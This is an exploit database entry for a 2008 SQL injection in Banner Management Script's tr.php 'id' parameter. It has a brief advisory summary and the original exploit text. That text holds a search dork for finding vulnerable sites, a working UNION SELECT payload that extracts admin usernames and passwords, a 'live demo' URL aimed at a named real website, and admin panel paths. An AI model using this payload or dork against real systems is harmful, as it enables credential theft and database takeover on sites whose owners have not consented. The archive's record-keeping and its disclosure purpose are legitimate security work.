Banner Management Script (tr.php id) Remote SQL Injection Vulnerability

vendor:

Banner Management Script

by:

S.W.A.T.

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Banner Management Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Banner Management Script (tr.php id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The attacker can inject arbitrary SQL code in the vulnerable parameter 'id' of the 'tr.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to disclose the content of the database, modify data, execute administration operations and potentially compromise the system.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------S.W.A.T.----------------------|
|
|    Author: S.W.A.T.
|
|    Home :  www.svvat.ir
|
|    email:  svvateam[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
|
| DorK   : inurl:tr.php?id= Banner
|___________________________________________________|

Exploit:
________



www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--






L!VE DEMO:
_________


http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


____________

Admin Login :

www.[target].com/Script/admin.php

or

www.[target].com/Script/adadmin.php

# milw0rm.com [2008-08-19]